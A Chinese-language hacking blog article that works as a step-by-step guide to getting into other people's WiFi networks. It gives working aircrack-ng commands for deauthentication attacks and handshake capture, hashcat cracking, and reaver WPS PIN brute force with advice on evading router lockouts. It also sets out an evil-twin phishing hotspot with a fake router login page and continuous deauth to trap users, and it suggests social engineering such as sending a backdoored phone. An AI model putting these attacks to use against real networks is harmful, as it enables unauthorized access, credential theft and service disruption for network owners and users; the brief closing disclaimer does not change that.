獲取WiFi密碼基礎姿勢大全

網絡上有各種教大家破解WiFi密碼的文章，不乏一些比較優秀的作者，也有像CDLinux、WiFiSlax、wifiway等專業系統。不過對於想全面掌握破解WiFi密碼姿勢的我們來說，還是需要不停地扒拉，畢竟一篇文章涵蓋的內容有限。而本篇文章將要基於樹莓派工具箱並綜合自己這些年的所有姿勢，為大家帶來WiFi破解基礎技能終結篇。

硬件：樹莓派工具箱、手機。

獲取密碼的姿勢：

1、WiFi萬能鑰匙獲取密碼

在破解wifi密碼之前用wifi萬能鑰匙掃描一下，如果出現了幸運的藍色小鑰匙，什麼都不要說了，這是緣分！當然，並不是所有的小鑰匙都代表著可以成功連接，因為它只是記錄了這條MAC，這個地點，曾經分享過密碼。縱使連不上，我們也可以通過手機 /data/misc/wifi/wpa_supplicant.conf文件 查看鑰匙更新的密碼組尋找規律(萬能鑰匙在嘗試連接時本地會儲存wifi密碼，連接失敗後更換下一組，最終無法連接時會刪除密碼，所以查看要及時。)

圖示：手機儲存的本地密碼

2、抓包大法：

抓包過程中要用到Aircrack-ng套件，這裡只講解下本節需要用到的命令。

1) 開啟網卡monitor（混雜）模式並殺掉對其有影響的進程。

root@kali:~# airmon-ng start wlan1root@kali:~# airmon-ng check kill

圖中wlan1mon就是開啟了混雜模式的網卡接口。

2) 捕獲數據包並顯示獲取的wifi列表

root@kali:~# airodump-ng wlan1mon #命令運行一段時間後捕獲到足夠的數據包可以按ctrl+c中止執行

部分名詞解釋：

 PWR：路由器的信號情況 數值越大信號越強 （-54 > -60） -1通常是獲取不到信號強弱信息 Data：捕獲的數據包數量，數值越大說明路由器上連接的無線設備越活躍 CH：WiFi頻道 ESSID：路由器wifi名字 當名字顯示的時候，說明路由器隱藏了SSID STATION：客戶端的MAC地址 BSSID：路由器的MAC地址 Probe：可能的WiFi名字(設備曾經連過的WiFi名字) Beacons：數值增加越快 接收到的路由器信號越好 

3) 選擇目標監聽握手包

root@kali:~# airodump-ng --bssid 6C:E8:73:6D:74:AA -c 6 -w 6d74aa wlan1mon #-bssid路由MAC,-c信號頻道，-w保存的文件名

在監聽過程中很快就會發現路由器連接的客戶端（STATION），注意此時ESSID仍然為空。

4) 發送Deauthentication（解除認證）攻擊

新建終端運行 root@kali:~# aireplay-ng -0 3 -a 6C:E8:73:6D:74:AA wlan1mon #-0代表所有客戶端,3是發送三次,-a是路由器MAC 目的是使路由器連接的客戶端掉線，以便抓取客戶端和路由器重連過程中的加密認證信息。 

回到監聽列表即可發現已經抓取到了握手包（右上角WPA handshake:***）,此時wifi隱藏的名字也顯示了出來。

Ctrl+c 終止監聽 ， 當前目錄裡面的6d74aa-01.cap就是抓到的數據包（包含握手包）

Tips：

Beacons快速增加說明信號很強（也可以理解為距離路由器很近）Data快速增加說明終端（連上wifi的設備）很活躍客戶端（STATION）MAC後面的PWR越大接收到的終端信號越強在Deauth攻擊中可以使用-c指定終端MAC，如果存在多個終端，選擇信號最強的那個，攻擊效果會更好。本文例子：aireplay-ng -0 -3 -a 6C:E8:73:6D:74:AA -c 50:2B:73:E8:8B:BF wlan1mon天線小知識：網卡天線增益越高，可工作距離越遠，對方向要求越嚴格。信號的發射方向以wifi天線橫截面為平面向四周擴散。增益越高，水平面上下擴散角度越窄，發射距離越遠。增益越小，水平面上下擴散角度越大，發射距離越近。

5) 暴力破解握手包獲取wifi密碼

密碼能否破解，要看字典裡面有沒有這個密碼，本文為自己搭建的熱點，作為演示，構建了一個包含密碼的小字典。

root@kali:~# aircrack-ng 6d74aa-01.cap -w /root/pwd/password.txt

在實際環境中，跑包用樹莓派你會哭的。通常採用電腦或者交由專業人員處理。

個人跑包建議：

win環境下使用wifipr配合Tirom發佈的9.8G字典，家庭電腦一般情況下二十幾個小時就可以跑完。

Linux環境下通過以下命令對數據包進行轉換，採用hashcat跑包，速度會更快。

root@kali:~# aircrack-ng 6d74aa-01.cap -J 6d74aa.hccaproot@kali:~# hashcat -m 2500 6d74aa.hccap /root/pwd/password.txt #-m 2500是破解wpa/psk模式

3、reaver暴力猜解PIN碼

1) 基本知識講解

wps加密中，終端接入路由器的唯一要求是一個8位數的PIN碼，這使得暴力破解變得可行。其次PIN碼的最後一位是一個校驗和，只要知道前七位就能算出最後一位。這樣我們就有了10的7次方個PIN碼組合，但實際實施過程中，嘗試這一千萬種PIN碼會花費以年為單位的時間。然而問題總會出現轉機，在wps加密身份驗證過程中接入點實際上把PIN碼分為兩部分來驗證，前四位，後三位。在PIN碼驗證失敗時接入點會向終端返回EAP-NACK消息，而通過該回應，攻擊者能確定PIN碼的前半部分或者後半部分是否正確。這樣在暴力猜解的時候最多就只需要10^4+10^3=11000個組合，以小時為單位的破解速率，完全足夠了。

2) 命令實例

root@kali:~# airmon-ng start wlan1root@kali:~# airmon-ng check -killroot@kali:~# wash -i wlan1monroot@kali:~# reaver -i wlan1mon -b 6C:E8:73:6D:74:AA -s /root/pingsession.txt -vv #-s是保存破解進程到文件

開啟wps的路由列表：

reaver破解過程：

破解成功：

需要注意，有些路由器有ping防護，連續收到n個錯誤的pin碼後會暫停n秒，之後才接受新的pin碼嘗試，當持續收到x個錯誤PIN碼後會休眠n分鐘，這些就需要實際測試過程中去發現，然後針對性的添加-d -l 參數使reaver更好的完成工作。

Tips：

新版Reaver集成了pixiewps使用-Z參數即可啟用。針對部分有漏洞的芯片幾乎可以實現1分鐘內出密碼。當已破解路由器更改密碼後只需要添加-p命令並指定pin碼即可秒出密碼。本文例子：reaver -i wlan1mon -b 6C:E8:73:6D:74:AA -p 00188302 

順便pixie了一個路由器：

4、偽造釣魚熱點獲取WiFi密碼

1) 手動配置釣魚熱點，實現用戶接入後自動彈出頁面，誘導用戶輸入密碼。

修改/etc/dnsmasq.conf------去掉no-pool前面的#號;指定resolv-file=/etc/resolv.conf;增加 address=/.com/10.0.0.1修改hostapd.conf 偽造相同的wifi名字並設置為開放熱點。修改/etc/apache2/sites-available/ooo-default.conf------增加 ErrorDocument 404 http://10.0.0.1/tplink/logincheck.html

2) 創建釣魚頁面

根據目標路由器的型號和後臺情況創建偽造的釣魚頁面，力求逼真，這樣才能最大程度的降低被攻擊者的警覺性。本文采用的是普聯的路由器，由於附近實在找不到好的素材，就參考著普聯官網把前文彈出蒙版的html代碼改動了下，湊合著用。

測試截圖：

設置完成後重啟dnsmasq、hostapd、apache2使修改生效。

3) 攻擊路由器促使終端設備持續掉線

root@kali:~# aireplay-ng -0 0 -a 6C:E8:73:6D:74:AA wlan1mon #-0 0代表不停地攻擊 也可以使用MDK3攻擊 效果會更好

當客戶端掉線時，用戶會嘗試重新連接網絡，這時候，有很大的概率會選擇我們偽造的熱點。手機端接入網絡的瞬間就會彈出認證頁面，win環境也會彈出認證提示，縱使用戶忽略，在打開任意頁面的時候也會在瀏覽器頂部顯示此網絡需要認證，或者直接跳轉到釣魚頁面（https除外，非.com除外）。

我們需要做的就是提前抓取好握手包，並使用tail命令監測密碼記錄文件的改變，發現新增內容後立即執行以下命令（方向鍵向上，table補全都很好用）。

root@kali:~# aircrack-ng 6d74aa-01.cap -w /var/www/html/tplink/1og.txt #把密碼記錄文件當做字典

當驗證密碼正確後立刻停止攻擊，關閉hostapd。

豈不美滋滋~

Tips：

WiFiPhisher 、Fluxion等軟件操作起來會更便捷些。修改完釣魚頁面後別忘了運行 chown www-data:www-data -R /var/www/ 將權限賦予apache2，不然很可能無法記錄密碼（無寫入權限） 

5、社會工程學攻擊獲取密碼

1) wps按鍵

能接觸到路由器的話先打開手機設置→無線網絡→高級設置→使用wps連接

在這之後，保守計算你會有一分半的時間按下路由器wps按鍵（認證過程會消耗時間）

2) 路由背面標籤

很多路由器背面標籤會展示PIN碼、MAC等信息。

3.) 寫在最後

對方的廢舊手機、社工庫裡面的賬號密碼、包括電腦內儲存的密碼（HID攻擊）等等。甚至某些情況下為了達到目的，可以直接向對方郵寄一臺有後門的手機。

知識就是力量，但是擁有力量不代表著可以為所欲為、觸犯法律。同樣，騎白馬的不一定是王子，會開鎖的也不一定是小偷。本文只是關於某些技術的實驗與驗證，只適用於學習。你知道的越多，就能夠越好的保護自己。

閱讀更多 黑客迷 的文章

關鍵字: 路由器 Wi-Fi 密碼